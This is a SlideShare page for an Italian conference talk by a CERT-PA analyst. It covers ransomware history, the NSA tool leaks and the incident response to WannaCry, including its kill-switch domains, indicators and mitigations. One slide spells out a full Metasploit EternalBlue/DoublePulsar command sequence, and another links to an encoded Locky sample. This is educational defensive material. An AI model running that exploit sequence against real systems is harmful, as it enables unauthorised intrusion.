SlideShare une entreprise Scribd logo

Il venerdì nero di wannacry

Gianni Amato
Gianni Amato

Quello di venerdì 12 Maggio 2017 è stato definito il cyberattacco più esteso, un attacco globale senza precedenti che ha interessato tantissime organizzazioni e aziende sparse in diversi Paesi del mondo. Tra le vittime dei Paesi colpiti figura anche l'Italia. Nel corso del talk si vuole illustrare come il CERT-PA (Computer Emergency Response Team) della Pubblica Amministrazione italiana ha affrontato il venerdì nero e i giorni a seguire il cyberattacco per gestire e contrastare tempestivamente la minaccia. Un tuffo dentro WannaCry per comprendere i dettagli tecnici, la genesi, le evoluzioni del malware e l'importanza della cooperazione informatica tra CERT italiani, europei e ricercatori indipendenti.

Technologie
1  sur  52
Télécharger pour lire hors ligne
Il Venerdì nero di Wannacry Gianni ‘guelfoweb’ Amato Bologna, 14 Ottobre 2017 HackInBo
HackInBo Winter Edition 2017 About me ● Name: Gianni Amato ● Nickname: guelfoweb ● Email: guelfoweb@gmail.com ● Web: www.guelfoweb.com ● Twitter: @guelfoweb
HackInBo Winter Edition 2017 Agenda ● Ransomware ○ Come li avevamo conosciuti ○ Come si sono evoluti ● Leak ○ CIA ○ NSA ● Il weekend nero ○ Analisi di Wannacry ○ Evoluzioni
HackInBo Winter Edition 2017 Ransomware: Come li conoscevamo
HackInBo Winter Edition 2017 C’era una volta MBR Lock ...correva l’anno 2012 ● Master Boot Record compromesso; ● MBR originale sostituito con MBR proprietario; ● Dati sul disco integri, sistema non è accessibile; ● Per ottenere la password era necessario chiamare un numero a pagamento per ricevere il codice (c0d3).
HackInBo Winter Edition 2017 Soluzione ● Era sufficiente ripristinare il Master Boot Record per accedere al sistema. ● Analisi successive hanno dimostrato che il codice accetta come password qualsiasi stringa composta da 14 cifre.
HackInBo Winter Edition 2017 Ransomware: Come si sono evoluti
HackInBo Winter Edition 2017 Varianti 2014 - 2015 2014 - CTB Locker ● utilizza Tor per raggiungere il C&C ● componenti Tor embedded ● distribuito tramite Drive-by download e Spam 2015 - TeslaCrypt ● destinato alla cummunity di videogiochi, successivamente esteso ai classici documenti ● elimina le Shadow Copy e i punti di ripristino ● distribuito attraverso i kit di Angler, Sweet Orange e Nuclear exploit. Download inconsapevole: ● Pop-up ● Error message ● Redirect ● Exploit
HackInBo Winter Edition 2017 Varianti 2015 - 2016 2015 - 2016 – MSIL ● sfrutta i server Web vulnerabili Java (JBoss obsolete) ● funzionalità di trojan ● utilizza psexec.exe per veicolare il malware verso host della stessa rete 2016 – Locky ● si propaga attraverso messaggi di posta elettronica ● allegati MS Office (macro) o compressi (.rar, .zip) con JS ● distribuito utilizzando il kit Nuclear Exploit
HackInBo Winter Edition 2017 Tecniche di evasione ● Differenti vettori di infezione ○ Exploit Kit ● Offuscamento del codice ○ Codifica ● Riconoscimento dell’ambiente ○ Fisico, virtuale, sandbox ● Rilevamento dei tool di analisi in esecuzione sul sistema ○ Strumenti di debug e di monitoraggio del traffico
HackInBo Winter Edition 2017 Scripting L'uso di tecniche di scripting non è nuovo (VBS, HTA, JS, PS) ● facili da offuscare ● difficili da individuare ● nella maggior parte dei casi sono dei downloader ● spesso richiamano altri script ● tutelano il malware vero e proprio https://a.pomfe.co/lmvkqth.jpg https://infosec.cert-pa.it/analyze/e10bdb0fe7ad6fed9e8dcc4418aede45.html
HackInBo Winter Edition 2017 Locky encoded https://gist.github.com/guelfoweb/1b7c4ecc3a2a7d8947ad
HackInBo Winter Edition 2017 Ransomware + Exploit Kit
HackInBo Winter Edition 2017 Leak: Armi digitali trafugate a CIA e NSA
HackInBo Winter Edition 2017 Marble Framework Marzo 2017 - Set di strumenti in grado di: ● Offuscare codice nocivo; ● Implementare tecniche Anti-Forensics. Allo scopo di: ● Mascherare malware, trojan e attacchi di hacking; ● Evitare che un attacco possa essere ricondotto alla CIA.
HackInBo Winter Edition 2017 Vault7: Source Code ● Russo ● Cinese ● Arabo ● Farsi Mascherare gli hack della CIA e concentrare l’attenzione degli investigatori su altri Paesi.
HackInBo Winter Edition 2017 Hacking Tools ● The Shadow Brokers ○ Equation Group ■ NSA Il primo annuncio del leak risale al 13 agosto 2016 (via twitter)
HackInBo Winter Edition 2017 MS16-114 - SMB 1.0 Protocollo Obsoleto! Il 13 settembre 2016 - appena un mese dopo l’annuncio del leak - Microsoft informa gli utenti di una importante vulnerabilità che affligge il protocollo SMB 1.0 e che consentirebbe l’esecuzione di codice remoto. Per ragioni di sicurezza Microsoft invita gli utenti a disabilitare il protocollo obsoleto. “If you have not already, follow the instructions in the blog to turn off SMB1 in your environment. You do not need this 30-year-old protocol, and you certainly do not want it.” - Microsoft.
HackInBo Winter Edition 2017 MS17-101 - SMB 1.0 Patch Il 14 marzo 2017 Microsoft rilascia un aggiornamento risolutivo per la vulnerabilità nel protocollo SMB 1.0 annunciata nel settembre 2016.
HackInBo Winter Edition 2017 Eternal* 14 Aprile 2017 – Microsoft dirama i risultati di analisi interne che riguardano la pubblicazione di alcuni exploit sottratti a «Equation Group» (NSA) rilasciati pubblicamente da un gruppo di hacker noto come «The Shadow Brokers».
HackInBo Winter Edition 2017 The Black Friday: WannaCry
HackInBo Winter Edition 2017 Venerdì, 12 Maggio 2017 CCN-CERT (Spagna) Il primo CERT, almeno in Europa, a diramare la notizia di un attacco massivo è il CERT spagnolo. https://www.ccn-cert.cni.es/seguridad-al-dia/comunic ados-ccn-cert/4464-ataque-masivo-de-ransomware-q ue-afecta-a-un-elevado-numero-de-organizaciones-es panolas.html
HackInBo Winter Edition 2017 È questione di minuti... ● Telefonate ● Messaggi ● Email ● Collaborazione tra CERT a livello europeo; ● Infosharing tra CERT italiani. ● Infosharing con Vendor ● Collaborazione tra ricercatori di tutto il mondo; ● Public infosharing su Twitter, AlienVault (IoC), GitHub.
HackInBo Winter Edition 2017 Cosa emerge dalle prime informazioni Sistemi affetti: ● Microsoft Windows Vista SP2 ● Windows Server 2008 SP2 e R2 SP1 ● Windows 7 ● Windows 8.1 ● Windows RT 8.1 ● Windows Server 2012 e R2 ● Windows 10 ● Windows Server 2016 Sistemi affetti fuori supporto: ● Microsoft Windows XP
HackInBo Winter Edition 2017 Quali danni ha provocato? ● 300.000 (?) computer compromessi in oltre 150 paesi in meno di 24 ore; ● In Spagna è stata confermata la compromissione di grosse aziende tra cui la compagnia di telecomunicazioni "Telefonica"; ● In Gran Bretagna pare che il ransomware abbia preso in ostaggio i PC di alcuni ospedali e strutture sanitarie.
HackInBo Winter Edition 2017 Phishing o Worm? Si presume che il malware si sia propagato inizialmente tramite posta elettronica, ma al momento non esiste una traccia ufficiale in circolazione che confermi l'ipotesi. Non è ancora stato individuato il paziente zero.
HackInBo Winter Edition 2017 Come lavora? ● Sfrutta l'exploit di Equation Group (NSA) noto come "EternalBlue" applicabile al protocollo Windows SMB. ● Una volta infettata una macchina, il malware provvede a scansionare la rete interna alla ricerca di altre postazioni affette dalla medesima vulnerabilità. ● Individuata la postazione vulnerabile viene eseguito l'exploit per ottenere accesso al sistema e successivamente cifra i file in esso contenuti rinominandoli con estensione ".WCRY". ● Per recuperare i dati in ostaggio viene chiesto un riscatto iniziale di 300$ in bitcoin, il prezzo sale man mano che scorre il conto alla rovescia del timer mostrato all'utente.
HackInBo Winter Edition 2017 Esistono soluzioni? ● Installare la patch MS17-010; ● Bloccare SMB 1 e 2; ● Mitigare la contaminazione sfruttando al meglio gli IoC. ○ Hash, Imphash, IP, Domain, Registry key, Prima informativa sul sito ufficiale CERT-PA ● https://www.cert-pa.it/web/guest/news?id=8342
HackInBo Winter Edition 2017 Sample su sandbox online La presenza online del primo sample su Malwr risale al 12/05/2017 @ 10:19 Dalle analisi automatiche nelle sandbox online non emergono evidenti informazioni relative alla propagazione. ● https://malwr.com/analysis/MTlhYjAzNTExNjllNGU0YThmMTRlZTRiOWE4YzhkZDI/ ● https://www.reverse.it/sample/24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703 480b1022c?environmentId=100
HackInBo Winter Edition 2017 Analisi preliminari Nome dominio (non registrato)
HackInBo Winter Edition 2017 Infosec analysis
HackInBo Winter Edition 2017 Monitoraggio delle informazioni
HackInBo Winter Edition 2017 IoC Sharing Problematiche riscontrate: ● Verifica dell’attendibilità ● Formati differenti ● Conversione in formato testuale ● Separatori improvvisati ● Rimozione dei duplicati ● Gestione dei feedback
HackInBo Winter Edition 2017 Hashr ● È un tool scritto e mantenuto dagli analisti del CERT-PA ● Consente di computare hash dei file e ricercare corrispondenza su una lista di hash predefinita (ad esempio IoC di hash); ● Distributito alla constituency; ● Tipologie di ricerche ○ ricorsive ○ per tipologia di file ● Non è di pubblico dominio
HackInBo Winter Edition 2017 Microsoft rilascia Patch per Windows XP https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
HackInBo Winter Edition 2017 Kill-Switch ● ayylmaotjhsstasdfasdfasdfasdfasdfasdfasdf[.]com ● ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com ● iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com ● iuqerfsodp9ifjaposdfjhgosurijfaewrwergweb[.]com ● iuqerssodp9ifjaposdfjhgosurijfaewrwergwea[.]com ● iuqssfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com Un eroe per caso?
HackInBo Winter Edition 2017 Nuove varianti Poche ore dopo la notizia dell’esistenza di un kill-switch, si ha evidenza di nuovi sample: ● con kill-switch differenti ● senza kill-switch
HackInBo Winter Edition 2017 Kill-Switch e Proxy INTERNET_OPEN_TYPE_DIRECT (Resolves all host names locally.) https://blog.didierstevens.com/2017/05/13/quickp ost-wcry-killswitch-check-is-not-proxy-aware/
HackInBo Winter Edition 2017 Sezione Resource La sezione «Resource» contiene un eseguibile, un pacchetto di circa 3,5 MB https://infosec.cert-pa.it/analyze/db349b97c37d22f5ea1d1841e3c89eb4.html
HackInBo Winter Edition 2017 MSSECSVC2.0 Il worm installa un servizio denominato “mssecsvc2.0”. Nome visualizzato: “Microsoft Security Center (2.0) service”. Quando il servizio è installato provvede a caricare i moduli per la cifratura.
HackInBo Winter Edition 2017 Network traffic ● Tenta di connettersi alla rete locale alla ricerca di SMB vulnerabile; ● Genera indirizzi IP pubblici casuali per lo stesso scopo; ● Se trova una postazione vulnerabile, viene trasferito il malware ed eseguito su di esso. path/to/mssecsvc -m security
HackInBo Winter Edition 2017 Folder dropped Public Key Private Key
HackInBo Winter Edition 2017 Persistenza HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun
HackInBo Winter Edition 2017 Da analisi successive ● Cifra 177 tipologie di file ● .wnry, .wcry, .wncry, .wncrypt ● RSA-2048 encryption keys with AES-128 encryption ● SMB Exploit (MS-17010) EternalBlue ● Sezione Resources contiene un pacchetto eseguibile ● TOR C&C ● Diversi indirizzi Bitcoin ● DNS Kill-Switch ● Persistenza garantita tramite registro di sistema
HackInBo Winter Edition 2017 Informazioni condivise ● News ○ https://www.cert-pa.it/web/guest/news?id=8342 ● News ○ https://www.cert-pa.it/web/guest/news?id=8382 ● Info ○ https://www.cert-pa.it/documents/10184/0/Consigli_WCry_CERT-PA6.pdf ● IoC ○ https://www.cert-pa.it/documents/10184/0/WCry.IoC.015.infosharing.xlsx
HackInBo Winter Edition 2017 EternalBlue e Metasploit ● msf > use windows/smb/eternalblue_doublepulsar ● msf > exploit (eternalblue_doublepulsar) > set eternalbluepath root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps ● msf > exploit (eternalblue_doublepulsar) > set doublepulsarpath root/Desktop//Eternalblue-Doublepulsar-Metasploit/deps ● msf > exploit (eternalblue_doublepulsar) > set targetarchitecture x64 ● msf > exploit (eternalblue_doublepulsar) > set processinject lsass.exe ● msf > exploit (eternalblue_doublepulsar) > set lhost 192.168.1.2 ● msf > exploit (eternalblue_doublepulsar) > set rhost 192.168.1.3 ● msf > exploit (eternalblue_doublepulsar) > exploit
HackInBo Winter Edition 2017 EternalRocks – WannaCry Evolution ● EternalRocks è la versione avanzata di WannaCry ● Oltre gli exploit di WannaCry (EternalBlue e DoublePulsar) sfrutta altri exploit: ○ EternalChampion; ○ EternalRomance; ○ EternalSynergy; ○ ArchiTouch; ○ SMBTouch.
HackInBo Winter Edition 2017 EternalRocks in due Step ● 1° STEP: Download TOR client per raggiungere il C&C ● 2° STEP: Dopo 24h arriva la risposta dal C&C che invia un pacchetto denominato «shadowbrokers.zip»
HackInBo Winter Edition 2017 EternalRocks nuova variante
HackInBo Winter Edition 2017 Similitudini Neel Mehta, ricercatore di Google, ha trovato alcune somiglianze tra una delle prime varianti di WannaCry e una Backdoor usata in passato dal gruppo hacker Lazarus, noto per gli attacchi del 2014 contro Sony. Si ritiene, ma non vi è conferma, che il gruppo Lazarus fosse legato alla Corea del Nord. Symantec ha approfondito l’argomento riportando alcune evidenze.
HackInBo Winter Edition 2017 Chi sono i colpevoli? I veri colpevoli sono coloro i quali hanno lasciato esposti e vulnerabili i propri sistemi.
HackInBo Winter Edition 2017 Grazie per l’attenzione!

Recommandé

Il Ransomware nelle Aziende - Eset Security Days 2016
Il Ransomware nelle Aziende - Eset Security Days 2016Il Ransomware nelle Aziende - Eset Security Days 2016
Il Ransomware nelle Aziende - Eset Security Days 2016Gianni Amato
 
Crimini Informatici 2012
Crimini Informatici 2012Crimini Informatici 2012
Crimini Informatici 2012Gianni Amato
 
Introduzione all'Information Gathering
Introduzione all'Information GatheringIntroduzione all'Information Gathering
Introduzione all'Information GatheringSalvatore Lentini
 
Heartbleed - OpenSSL Bug
Heartbleed - OpenSSL BugHeartbleed - OpenSSL Bug
Heartbleed - OpenSSL BugSalvatore Lentini
 
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaNFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaAndrea Draghetti
 
La complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoLa complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoMarco Ferrigno
 
Il tuo router è sicuro?!
Il tuo router è sicuro?!Il tuo router è sicuro?!
Il tuo router è sicuro?!Raffaele Sommese
 
Devianze
DevianzeDevianze
Devianzescrivano
 

Recommandé

Il Ransomware nelle Aziende - Eset Security Days 2016
Il Ransomware nelle Aziende - Eset Security Days 2016Il Ransomware nelle Aziende - Eset Security Days 2016
Il Ransomware nelle Aziende - Eset Security Days 2016Gianni Amato
 
Crimini Informatici 2012
Crimini Informatici 2012Crimini Informatici 2012
Crimini Informatici 2012Gianni Amato
 
Introduzione all'Information Gathering
Introduzione all'Information GatheringIntroduzione all'Information Gathering
Introduzione all'Information GatheringSalvatore Lentini
 
Heartbleed - OpenSSL Bug
Heartbleed - OpenSSL BugHeartbleed - OpenSSL Bug
Heartbleed - OpenSSL BugSalvatore Lentini
 
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaNFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaAndrea Draghetti
 
La complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoLa complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoMarco Ferrigno
 
Il tuo router è sicuro?!
Il tuo router è sicuro?!Il tuo router è sicuro?!
Il tuo router è sicuro?!Raffaele Sommese
 
Devianze
DevianzeDevianze
Devianzescrivano
 
Cyber Forensics - Acquisizione e analisi dei dati
Cyber Forensics - Acquisizione e analisi dei datiCyber Forensics - Acquisizione e analisi dei dati
Cyber Forensics - Acquisizione e analisi dei datiMarco Ferrigno
 
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open sourceLinux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open sourceMario Rossano
 
Amato HackInBo 2013
Amato HackInBo 2013Amato HackInBo 2013
Amato HackInBo 2013Gianni Amato
 
Simulazione di un Penetration Test
Simulazione di un Penetration TestSimulazione di un Penetration Test
Simulazione di un Penetration TestSalvatore Lentini
 
Scacco matto ai crytpo malware (smau 2016 - bologna)
Scacco matto ai crytpo malware (smau 2016 - bologna)Scacco matto ai crytpo malware (smau 2016 - bologna)
Scacco matto ai crytpo malware (smau 2016 - bologna)Gianfranco Tonello
 
Checkmate to crypto malware. Scacco matto ai crypto malware
Checkmate to crypto malware. Scacco matto ai crypto malwareCheckmate to crypto malware. Scacco matto ai crypto malware
Checkmate to crypto malware. Scacco matto ai crypto malwareGianfranco Tonello
 
Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)Gianfranco Tonello
 
Le fasi di un Penetration testing
Le fasi di un Penetration testingLe fasi di un Penetration testing
Le fasi di un Penetration testingAlessandra Zullo
 
Digital Forensics: metodologie analisi multipiattaforma
Digital Forensics: metodologie analisi multipiattaformaDigital Forensics: metodologie analisi multipiattaforma
Digital Forensics: metodologie analisi multipiattaformaMarco Ferrigno
 
Data hiding - metodologie e strumenti open source
Data hiding - metodologie e strumenti open sourceData hiding - metodologie e strumenti open source
Data hiding - metodologie e strumenti open sourceMarco Ferrigno
 
BackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration TestBackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration TestAndrea Draghetti
 
Botnet e nuove forme di malware
Botnet e nuove forme di malwareBotnet e nuove forme di malware
Botnet e nuove forme di malwareGianni Amato
 
Linux, sicurezza & social hacking
Linux, sicurezza & social hackingLinux, sicurezza & social hacking
Linux, sicurezza & social hackingFabio Mora
 
Come proteggersi dagli attacchi informatici
Come proteggersi dagli attacchi informaticiCome proteggersi dagli attacchi informatici
Come proteggersi dagli attacchi informaticiEmerasoft, solutions to collaborate
 
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisure
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisureCCI2018 - Ethical Hacking, gli step di un attacco e le contromisure
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisurewalk2talk srl
 
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdf
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdfCome Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdf
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdfHelpRansomware
 
Come Funziona Il Ransomware LockBit.pdf
Come Funziona Il Ransomware LockBit.pdfCome Funziona Il Ransomware LockBit.pdf
Come Funziona Il Ransomware LockBit.pdfHelpRansomware
 
Linux Day 2015 Genova
Linux Day 2015 GenovaLinux Day 2015 Genova
Linux Day 2015 Genovamperrando
 
Ransomware Attack nel 2019 Dal file system ai database e non solo...
Ransomware Attack nel 2019 Dal file system ai database e non solo...Ransomware Attack nel 2019 Dal file system ai database e non solo...
Ransomware Attack nel 2019 Dal file system ai database e non solo...Massimo Chirivì
 
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018Gianfranco Tonello
 
Cyber Defense - How to find and manage zero-days
Cyber Defense - How to find and manage zero-days Cyber Defense - How to find and manage zero-days
Cyber Defense - How to find and manage zero-days Simone Onofri
 
Sicurezza Informatica Evento AITA Genova
Sicurezza Informatica Evento AITA GenovaSicurezza Informatica Evento AITA Genova
Sicurezza Informatica Evento AITA Genovauninfoit
 

Contenu connexe

Tendances

Cyber Forensics - Acquisizione e analisi dei dati
Cyber Forensics - Acquisizione e analisi dei datiCyber Forensics - Acquisizione e analisi dei dati
Cyber Forensics - Acquisizione e analisi dei datiMarco Ferrigno
 
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open sourceLinux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open sourceMario Rossano
 
Amato HackInBo 2013
Amato HackInBo 2013Amato HackInBo 2013
Amato HackInBo 2013Gianni Amato
 
Simulazione di un Penetration Test
Simulazione di un Penetration TestSimulazione di un Penetration Test
Simulazione di un Penetration TestSalvatore Lentini
 
Scacco matto ai crytpo malware (smau 2016 - bologna)
Scacco matto ai crytpo malware (smau 2016 - bologna)Scacco matto ai crytpo malware (smau 2016 - bologna)
Scacco matto ai crytpo malware (smau 2016 - bologna)Gianfranco Tonello
 
Checkmate to crypto malware. Scacco matto ai crypto malware
Checkmate to crypto malware. Scacco matto ai crypto malwareCheckmate to crypto malware. Scacco matto ai crypto malware
Checkmate to crypto malware. Scacco matto ai crypto malwareGianfranco Tonello
 
Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)Gianfranco Tonello
 
Le fasi di un Penetration testing
Le fasi di un Penetration testingLe fasi di un Penetration testing
Le fasi di un Penetration testingAlessandra Zullo
 
Digital Forensics: metodologie analisi multipiattaforma
Digital Forensics: metodologie analisi multipiattaformaDigital Forensics: metodologie analisi multipiattaforma
Digital Forensics: metodologie analisi multipiattaformaMarco Ferrigno
 
Data hiding - metodologie e strumenti open source
Data hiding - metodologie e strumenti open sourceData hiding - metodologie e strumenti open source
Data hiding - metodologie e strumenti open sourceMarco Ferrigno
 
BackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration TestBackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration TestAndrea Draghetti
 

Tendances (11)

Cyber Forensics - Acquisizione e analisi dei dati
Cyber Forensics - Acquisizione e analisi dei datiCyber Forensics - Acquisizione e analisi dei dati
Cyber Forensics - Acquisizione e analisi dei dati
 
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open sourceLinux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open source
 
Amato HackInBo 2013
Amato HackInBo 2013Amato HackInBo 2013
Amato HackInBo 2013
 
Simulazione di un Penetration Test
Simulazione di un Penetration TestSimulazione di un Penetration Test
Simulazione di un Penetration Test
 
Scacco matto ai crytpo malware (smau 2016 - bologna)
Scacco matto ai crytpo malware (smau 2016 - bologna)Scacco matto ai crytpo malware (smau 2016 - bologna)
Scacco matto ai crytpo malware (smau 2016 - bologna)
 
Checkmate to crypto malware. Scacco matto ai crypto malware
Checkmate to crypto malware. Scacco matto ai crypto malwareCheckmate to crypto malware. Scacco matto ai crypto malware
Checkmate to crypto malware. Scacco matto ai crypto malware
 
Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)
 
Le fasi di un Penetration testing
Le fasi di un Penetration testingLe fasi di un Penetration testing
Le fasi di un Penetration testing
 
Digital Forensics: metodologie analisi multipiattaforma
Digital Forensics: metodologie analisi multipiattaformaDigital Forensics: metodologie analisi multipiattaforma
Digital Forensics: metodologie analisi multipiattaforma
 
Data hiding - metodologie e strumenti open source
Data hiding - metodologie e strumenti open sourceData hiding - metodologie e strumenti open source
Data hiding - metodologie e strumenti open source
 
BackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration TestBackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration Test
 

Similaire à Il venerdì nero di wannacry

Botnet e nuove forme di malware
Botnet e nuove forme di malwareBotnet e nuove forme di malware
Botnet e nuove forme di malwareGianni Amato
 
Linux, sicurezza & social hacking
Linux, sicurezza & social hackingLinux, sicurezza & social hacking
Linux, sicurezza & social hackingFabio Mora
 
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisure
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisureCCI2018 - Ethical Hacking, gli step di un attacco e le contromisure
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisurewalk2talk srl
 
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdf
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdfCome Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdf
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdfHelpRansomware
 
Come Funziona Il Ransomware LockBit.pdf
Come Funziona Il Ransomware LockBit.pdfCome Funziona Il Ransomware LockBit.pdf
Come Funziona Il Ransomware LockBit.pdfHelpRansomware
 
Linux Day 2015 Genova
Linux Day 2015 GenovaLinux Day 2015 Genova
Linux Day 2015 Genovamperrando
 
Ransomware Attack nel 2019 Dal file system ai database e non solo...
Ransomware Attack nel 2019 Dal file system ai database e non solo...Ransomware Attack nel 2019 Dal file system ai database e non solo...
Ransomware Attack nel 2019 Dal file system ai database e non solo...Massimo Chirivì
 
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018Gianfranco Tonello
 
Cyber Defense - How to find and manage zero-days
Cyber Defense - How to find and manage zero-days Cyber Defense - How to find and manage zero-days
Cyber Defense - How to find and manage zero-days Simone Onofri
 
Sicurezza Informatica Evento AITA Genova
Sicurezza Informatica Evento AITA GenovaSicurezza Informatica Evento AITA Genova
Sicurezza Informatica Evento AITA Genovauninfoit
 
Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...Marco Ferrigno
 
Sfdumper e cugini
Sfdumper e cuginiSfdumper e cugini
Sfdumper e cuginidenis frati
 
Matteo Flora: Cyber Warfare e CyberGuerrilla
Matteo Flora: Cyber Warfare e CyberGuerrillaMatteo Flora: Cyber Warfare e CyberGuerrilla
Matteo Flora: Cyber Warfare e CyberGuerrillaMatteo Flora
 
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioni
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioniBackdoor Coding: Analisi di una semplice backdoor e prime applicazioni
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioniSalvatore Lentini
 
Programma il futuro: una scelta open source
Programma il futuro: una scelta open sourceProgramma il futuro: una scelta open source
Programma il futuro: una scelta open sourceMarco Ferrigno
 
Come recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdfCome recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdfHelpRansomware
 

Similaire à Il venerdì nero di wannacry (20)

Botnet e nuove forme di malware
Botnet e nuove forme di malwareBotnet e nuove forme di malware
Botnet e nuove forme di malware
 
Linux, sicurezza & social hacking
Linux, sicurezza & social hackingLinux, sicurezza & social hacking
Linux, sicurezza & social hacking
 
Come proteggersi dagli attacchi informatici
Come proteggersi dagli attacchi informaticiCome proteggersi dagli attacchi informatici
Come proteggersi dagli attacchi informatici
 
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisure
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisureCCI2018 - Ethical Hacking, gli step di un attacco e le contromisure
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisure
 
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdf
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdfCome Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdf
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdf
 
Come Funziona Il Ransomware LockBit.pdf
Come Funziona Il Ransomware LockBit.pdfCome Funziona Il Ransomware LockBit.pdf
Come Funziona Il Ransomware LockBit.pdf
 
Linux Day 2015 Genova
Linux Day 2015 GenovaLinux Day 2015 Genova
Linux Day 2015 Genova
 
Ransomware Attack nel 2019 Dal file system ai database e non solo...
Ransomware Attack nel 2019 Dal file system ai database e non solo...Ransomware Attack nel 2019 Dal file system ai database e non solo...
Ransomware Attack nel 2019 Dal file system ai database e non solo...
 
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018
Ransomware ma NON solo… ecco come si stanno evolvendo le minacce nel 2018
 
Cyber Defense - How to find and manage zero-days
Cyber Defense - How to find and manage zero-days Cyber Defense - How to find and manage zero-days
Cyber Defense - How to find and manage zero-days
 
Sicurezza Informatica Evento AITA Genova
Sicurezza Informatica Evento AITA GenovaSicurezza Informatica Evento AITA Genova
Sicurezza Informatica Evento AITA Genova
 
Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...Security and hacking engineering - metodologie di attacco e difesa con strume...
Security and hacking engineering - metodologie di attacco e difesa con strume...
 
Sfdumper e cugini
Sfdumper e cuginiSfdumper e cugini
Sfdumper e cugini
 
Pc piu sicuro
Pc piu sicuroPc piu sicuro
Pc piu sicuro
 
Acciaio ...inux!
Acciaio ...inux!Acciaio ...inux!
Acciaio ...inux!
 
Matteo Flora: Cyber Warfare e CyberGuerrilla
Matteo Flora: Cyber Warfare e CyberGuerrillaMatteo Flora: Cyber Warfare e CyberGuerrilla
Matteo Flora: Cyber Warfare e CyberGuerrilla
 
Privacy in enigmate
Privacy in enigmatePrivacy in enigmate
